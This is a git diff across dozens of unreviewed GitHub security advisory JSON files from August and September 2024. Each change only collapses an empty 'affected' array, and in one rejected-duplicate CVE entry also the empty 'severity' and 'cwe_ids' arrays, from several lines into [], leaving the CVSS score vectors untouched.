+++ b/advisories/unreviewed/2024/08/GHSA-c844-4fjf-3jhf/GHSA-c844-4fjf-3jhf.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/08/GHSA-hf5v-h65q-2g27/GHSA-hf5v-h65q-2g27.json b/advisories/unreviewed/2024/08/GHSA-hf5v-h65q-2g27/GHSA-hf5v-h65q-2g27.json
index 75d736a38bf..28d56e4be9e 100644
--- a/advisories/unreviewed/2024/08/GHSA-hf5v-h65q-2g27/GHSA-hf5v-h65q-2g27.json
+++ b/advisories/unreviewed/2024/08/GHSA-hf5v-h65q-2g27/GHSA-hf5v-h65q-2g27.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/08/GHSA-hm5h-rw9m-g27p/GHSA-hm5h-rw9m-g27p.json b/advisories/unreviewed/2024/08/GHSA-hm5h-rw9m-g27p/GHSA-hm5h-rw9m-g27p.json
index ee1cb075264..44514da6571 100644
--- a/advisories/unreviewed/2024/08/GHSA-hm5h-rw9m-g27p/GHSA-hm5h-rw9m-g27p.json
+++ b/advisories/unreviewed/2024/08/GHSA-hm5h-rw9m-g27p/GHSA-hm5h-rw9m-g27p.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/08/GHSA-j37h-9m2q-gr9m/GHSA-j37h-9m2q-gr9m.json b/advisories/unreviewed/2024/08/GHSA-j37h-9m2q-gr9m/GHSA-j37h-9m2q-gr9m.json
index f5431859626..d3b3416fd08 100644
--- a/advisories/unreviewed/2024/08/GHSA-j37h-9m2q-gr9m/GHSA-j37h-9m2q-gr9m.json
+++ b/advisories/unreviewed/2024/08/GHSA-j37h-9m2q-gr9m/GHSA-j37h-9m2q-gr9m.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/08/GHSA-j37w-6f9h-3r4c/GHSA-j37w-6f9h-3r4c.json b/advisories/unreviewed/2024/08/GHSA-j37w-6f9h-3r4c/GHSA-j37w-6f9h-3r4c.json
index 201edc75955..e101b1fa021 100644
--- a/advisories/unreviewed/2024/08/GHSA-j37w-6f9h-3r4c/GHSA-j37w-6f9h-3r4c.json
+++ b/advisories/unreviewed/2024/08/GHSA-j37w-6f9h-3r4c/GHSA-j37w-6f9h-3r4c.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/08/GHSA-prg4-487r-rr8w/GHSA-prg4-487r-rr8w.json b/advisories/unreviewed/2024/08/GHSA-prg4-487r-rr8w/GHSA-prg4-487r-rr8w.json
index d42479a8a2f..f325e6f42a8 100644
--- a/advisories/unreviewed/2024/08/GHSA-prg4-487r-rr8w/GHSA-prg4-487r-rr8w.json
+++ b/advisories/unreviewed/2024/08/GHSA-prg4-487r-rr8w/GHSA-prg4-487r-rr8w.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/08/GHSA-r3q2-4p93-pgrg/GHSA-r3q2-4p93-pgrg.json b/advisories/unreviewed/2024/08/GHSA-r3q2-4p93-pgrg/GHSA-r3q2-4p93-pgrg.json
index 318f0f1f774..cca56cad176 100644
--- a/advisories/unreviewed/2024/08/GHSA-r3q2-4p93-pgrg/GHSA-r3q2-4p93-pgrg.json
+++ b/advisories/unreviewed/2024/08/GHSA-r3q2-4p93-pgrg/GHSA-r3q2-4p93-pgrg.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/08/GHSA-w8qw-wpmq-q46h/GHSA-w8qw-wpmq-q46h.json b/advisories/unreviewed/2024/08/GHSA-w8qw-wpmq-q46h/GHSA-w8qw-wpmq-q46h.json
index deb86ee6566..e93b559ed12 100644
--- a/advisories/unreviewed/2024/08/GHSA-w8qw-wpmq-q46h/GHSA-w8qw-wpmq-q46h.json
+++ b/advisories/unreviewed/2024/08/GHSA-w8qw-wpmq-q46h/GHSA-w8qw-wpmq-q46h.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/08/GHSA-xgv6-w8v2-xv5f/GHSA-xgv6-w8v2-xv5f.json b/advisories/unreviewed/2024/08/GHSA-xgv6-w8v2-xv5f/GHSA-xgv6-w8v2-xv5f.json
index fef38e123f2..9ef13c47ba7 100644
--- a/advisories/unreviewed/2024/08/GHSA-xgv6-w8v2-xv5f/GHSA-xgv6-w8v2-xv5f.json
+++ b/advisories/unreviewed/2024/08/GHSA-xgv6-w8v2-xv5f/GHSA-xgv6-w8v2-xv5f.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-3w85-rr8r-762j/GHSA-3w85-rr8r-762j.json b/advisories/unreviewed/2024/09/GHSA-3w85-rr8r-762j/GHSA-3w85-rr8r-762j.json
index d948aeb2d2e..f6fee4b013b 100644
--- a/advisories/unreviewed/2024/09/GHSA-3w85-rr8r-762j/GHSA-3w85-rr8r-762j.json
+++ b/advisories/unreviewed/2024/09/GHSA-3w85-rr8r-762j/GHSA-3w85-rr8r-762j.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-474v-px9m-xcjx/GHSA-474v-px9m-xcjx.json b/advisories/unreviewed/2024/09/GHSA-474v-px9m-xcjx/GHSA-474v-px9m-xcjx.json
index 465b140efa2..83a4e2a9666 100644
--- a/advisories/unreviewed/2024/09/GHSA-474v-px9m-xcjx/GHSA-474v-px9m-xcjx.json
+++ b/advisories/unreviewed/2024/09/GHSA-474v-px9m-xcjx/GHSA-474v-px9m-xcjx.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-56gf-j26c-43xh/GHSA-56gf-j26c-43xh.json b/advisories/unreviewed/2024/09/GHSA-56gf-j26c-43xh/GHSA-56gf-j26c-43xh.json
index 8237928a518..2804aa3909a 100644
--- a/advisories/unreviewed/2024/09/GHSA-56gf-j26c-43xh/GHSA-56gf-j26c-43xh.json
+++ b/advisories/unreviewed/2024/09/GHSA-56gf-j26c-43xh/GHSA-56gf-j26c-43xh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-5fx5-p3qx-6q26/GHSA-5fx5-p3qx-6q26.json b/advisories/unreviewed/2024/09/GHSA-5fx5-p3qx-6q26/GHSA-5fx5-p3qx-6q26.json
index 2a1ed473e81..358813c6c1d 100644
--- a/advisories/unreviewed/2024/09/GHSA-5fx5-p3qx-6q26/GHSA-5fx5-p3qx-6q26.json
+++ b/advisories/unreviewed/2024/09/GHSA-5fx5-p3qx-6q26/GHSA-5fx5-p3qx-6q26.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-5jh6-g6wh-386v/GHSA-5jh6-g6wh-386v.json b/advisories/unreviewed/2024/09/GHSA-5jh6-g6wh-386v/GHSA-5jh6-g6wh-386v.json
index 01ef480046c..de9973db8fb 100644
--- a/advisories/unreviewed/2024/09/GHSA-5jh6-g6wh-386v/GHSA-5jh6-g6wh-386v.json
+++ b/advisories/unreviewed/2024/09/GHSA-5jh6-g6wh-386v/GHSA-5jh6-g6wh-386v.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:C/RE:L/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-6h8g-35xx-6xv3/GHSA-6h8g-35xx-6xv3.json b/advisories/unreviewed/2024/09/GHSA-6h8g-35xx-6xv3/GHSA-6h8g-35xx-6xv3.json
index 03650e2e617..9e2f4bc1920 100644
--- a/advisories/unreviewed/2024/09/GHSA-6h8g-35xx-6xv3/GHSA-6h8g-35xx-6xv3.json
+++ b/advisories/unreviewed/2024/09/GHSA-6h8g-35xx-6xv3/GHSA-6h8g-35xx-6xv3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-7hx6-3799-26cc/GHSA-7hx6-3799-26cc.json b/advisories/unreviewed/2024/09/GHSA-7hx6-3799-26cc/GHSA-7hx6-3799-26cc.json
index 5c4c53e7f9b..40aef18ba03 100644
--- a/advisories/unreviewed/2024/09/GHSA-7hx6-3799-26cc/GHSA-7hx6-3799-26cc.json
+++ b/advisories/unreviewed/2024/09/GHSA-7hx6-3799-26cc/GHSA-7hx6-3799-26cc.json
@@ -7,12 +7,8 @@
"CVE-2024-45804"
],
"details": "Rejected reason: This CVE is a duplicate of another CVE.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -20,9 +16,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/09/GHSA-cwj6-8v2q-g52w/GHSA-cwj6-8v2q-g52w.json b/advisories/unreviewed/2024/09/GHSA-cwj6-8v2q-g52w/GHSA-cwj6-8v2q-g52w.json
index 493b3d4ce8c..660405f0338 100644
--- a/advisories/unreviewed/2024/09/GHSA-cwj6-8v2q-g52w/GHSA-cwj6-8v2q-g52w.json
+++ b/advisories/unreviewed/2024/09/GHSA-cwj6-8v2q-g52w/GHSA-cwj6-8v2q-g52w.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-fvjr-4pf9-7pjq/GHSA-fvjr-4pf9-7pjq.json b/advisories/unreviewed/2024/09/GHSA-fvjr-4pf9-7pjq/GHSA-fvjr-4pf9-7pjq.json
index 1bbb374d3c0..95b3b1b5ab5 100644
--- a/advisories/unreviewed/2024/09/GHSA-fvjr-4pf9-7pjq/GHSA-fvjr-4pf9-7pjq.json
+++ b/advisories/unreviewed/2024/09/GHSA-fvjr-4pf9-7pjq/GHSA-fvjr-4pf9-7pjq.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-hqpj-xx46-mwvh/GHSA-hqpj-xx46-mwvh.json b/advisories/unreviewed/2024/09/GHSA-hqpj-xx46-mwvh/GHSA-hqpj-xx46-mwvh.json
index 034d328442e..f2d0bb178d5 100644
--- a/advisories/unreviewed/2024/09/GHSA-hqpj-xx46-mwvh/GHSA-hqpj-xx46-mwvh.json
+++ b/advisories/unreviewed/2024/09/GHSA-hqpj-xx46-mwvh/GHSA-hqpj-xx46-mwvh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-hr9f-xcjq-vpmj/GHSA-hr9f-xcjq-vpmj.json b/advisories/unreviewed/2024/09/GHSA-hr9f-xcjq-vpmj/GHSA-hr9f-xcjq-vpmj.json
index 477d4388458..79361831099 100644
--- a/advisories/unreviewed/2024/09/GHSA-hr9f-xcjq-vpmj/GHSA-hr9f-xcjq-vpmj.json
+++ b/advisories/unreviewed/2024/09/GHSA-hr9f-xcjq-vpmj/GHSA-hr9f-xcjq-vpmj.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-j6v2-m8w2-27f8/GHSA-j6v2-m8w2-27f8.json b/advisories/unreviewed/2024/09/GHSA-j6v2-m8w2-27f8/GHSA-j6v2-m8w2-27f8.json
index ebd01283938..5d7684fd9ab 100644
--- a/advisories/unreviewed/2024/09/GHSA-j6v2-m8w2-27f8/GHSA-j6v2-m8w2-27f8.json
+++ b/advisories/unreviewed/2024/09/GHSA-j6v2-m8w2-27f8/GHSA-j6v2-m8w2-27f8.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-jq4w-q2w4-8qw3/GHSA-jq4w-q2w4-8qw3.json b/advisories/unreviewed/2024/09/GHSA-jq4w-q2w4-8qw3/GHSA-jq4w-q2w4-8qw3.json
index df040972c9f..528b59ec3b3 100644
--- a/advisories/unreviewed/2024/09/GHSA-jq4w-q2w4-8qw3/GHSA-jq4w-q2w4-8qw3.json
+++ b/advisories/unreviewed/2024/09/GHSA-jq4w-q2w4-8qw3/GHSA-jq4w-q2w4-8qw3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-mfr5-p5vc-mx4q/GHSA-mfr5-p5vc-mx4q.json b/advisories/unreviewed/2024/09/GHSA-mfr5-p5vc-mx4q/GHSA-mfr5-p5vc-mx4q.json
index f5cf6973b52..b841e6db995 100644
--- a/advisories/unreviewed/2024/09/GHSA-mfr5-p5vc-mx4q/GHSA-mfr5-p5vc-mx4q.json
+++ b/advisories/unreviewed/2024/09/GHSA-mfr5-p5vc-mx4q/GHSA-mfr5-p5vc-mx4q.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-pg6q-2w5f-8pw9/GHSA-pg6q-2w5f-8pw9.json b/advisories/unreviewed/2024/09/GHSA-pg6q-2w5f-8pw9/GHSA-pg6q-2w5f-8pw9.json
index b53d21e9885..d1c1f2c2408 100644
--- a/advisories/unreviewed/2024/09/GHSA-pg6q-2w5f-8pw9/GHSA-pg6q-2w5f-8pw9.json
+++ b/advisories/unreviewed/2024/09/GHSA-pg6q-2w5f-8pw9/GHSA-pg6q-2w5f-8pw9.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-pmhg-5fq2-cxqq/GHSA-pmhg-5fq2-cxqq.json b/advisories/unreviewed/2024/09/GHSA-pmhg-5fq2-cxqq/GHSA-pmhg-5fq2-cxqq.json
index f2ba97260b9..ed733f8c06f 100644
--- a/advisories/unreviewed/2024/09/GHSA-pmhg-5fq2-cxqq/GHSA-pmhg-5fq2-cxqq.json
+++ b/advisories/unreviewed/2024/09/GHSA-pmhg-5fq2-cxqq/GHSA-pmhg-5fq2-cxqq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-pr5w-3qqg-c6mc/GHSA-pr5w-3qqg-c6mc.json b/advisories/unreviewed/2024/09/GHSA-pr5w-3qqg-c6mc/GHSA-pr5w-3qqg-c6mc.json
index e81bd5c8a2d..612e893d60b 100644
--- a/advisories/unreviewed/2024/09/GHSA-pr5w-3qqg-c6mc/GHSA-pr5w-3qqg-c6mc.json
+++ b/advisories/unreviewed/2024/09/GHSA-pr5w-3qqg-c6mc/GHSA-pr5w-3qqg-c6mc.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-px24-vp7g-w3gw/GHSA-px24-vp7g-w3gw.json b/advisories/unreviewed/2024/09/GHSA-px24-vp7g-w3gw/GHSA-px24-vp7g-w3gw.json
index 57a15e4ef80..c6e14e81736 100644
--- a/advisories/unreviewed/2024/09/GHSA-px24-vp7g-w3gw/GHSA-px24-vp7g-w3gw.json
+++ b/advisories/unreviewed/2024/09/GHSA-px24-vp7g-w3gw/GHSA-px24-vp7g-w3gw.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-q6v4-gcc8-vrgw/GHSA-q6v4-gcc8-vrgw.json b/advisories/unreviewed/2024/09/GHSA-q6v4-gcc8-vrgw/GHSA-q6v4-gcc8-vrgw.json
index 9979df16b64..83799c0a789 100644
--- a/advisories/unreviewed/2024/09/GHSA-q6v4-gcc8-vrgw/GHSA-q6v4-gcc8-vrgw.json
+++ b/advisories/unreviewed/2024/09/GHSA-q6v4-gcc8-vrgw/GHSA-q6v4-gcc8-vrgw.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-rc6w-v672-99cv/GHSA-rc6w-v672-99cv.json b/advisories/unreviewed/2024/09/GHSA-rc6w-v672-99cv/GHSA-rc6w-v672-99cv.json
index e271ba190c8..403a5510389 100644
--- a/advisories/unreviewed/2024/09/GHSA-rc6w-v672-99cv/GHSA-rc6w-v672-99cv.json
+++ b/advisories/unreviewed/2024/09/GHSA-rc6w-v672-99cv/GHSA-rc6w-v672-99cv.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-v6rj-vqvp-pjw9/GHSA-v6rj-vqvp-pjw9.json b/advisories/unreviewed/2024/09/GHSA-v6rj-vqvp-pjw9/GHSA-v6rj-vqvp-pjw9.json
index f53b16988b8..56f78fefd58 100644
--- a/advisories/unreviewed/2024/09/GHSA-v6rj-vqvp-pjw9/GHSA-v6rj-vqvp-pjw9.json
+++ b/advisories/unreviewed/2024/09/GHSA-v6rj-vqvp-pjw9/GHSA-v6rj-vqvp-pjw9.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-wc8g-qpv4-8j46/GHSA-wc8g-qpv4-8j46.json b/advisories/unreviewed/2024/09/GHSA-wc8g-qpv4-8j46/GHSA-wc8g-qpv4-8j46.json
index d6a5a927392..63511612c92 100644
--- a/advisories/unreviewed/2024/09/GHSA-wc8g-qpv4-8j46/GHSA-wc8g-qpv4-8j46.json
+++ b/advisories/unreviewed/2024/09/GHSA-wc8g-qpv4-8j46/GHSA-wc8g-qpv4-8j46.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-x6hc-3hv8-fjx3/GHSA-x6hc-3hv8-fjx3.json b/advisories/unreviewed/2024/09/GHSA-x6hc-3hv8-fjx3/GHSA-x6hc-3hv8-fjx3.json
index 03678472dca..c6c9356237e 100644
--- a/advisories/unreviewed/2024/09/GHSA-x6hc-3hv8-fjx3/GHSA-x6hc-3hv8-fjx3.json
+++ b/advisories/unreviewed/2024/09/GHSA-x6hc-3hv8-fjx3/GHSA-x6hc-3hv8-fjx3.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/09/GHSA-xj9g-83cq-wf3m/GHSA-xj9g-83cq-wf3m.json b/advisories/unreviewed/2024/09/GHSA-xj9g-83cq-wf3m/GHSA-xj9g-83cq-wf3m.json
index 6d82a335b02..bc473ee236b 100644
--- a/advisories/unreviewed/2024/09/GHSA-xj9g-83cq-wf3m/GHSA-xj9g-83cq-wf3m.json
+++ b/advisories/unreviewed/2024/09/GHSA-xj9g-83cq-wf3m/GHSA-xj9g-83cq-wf3m.json
@@ -17,9 +17,7 @@
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",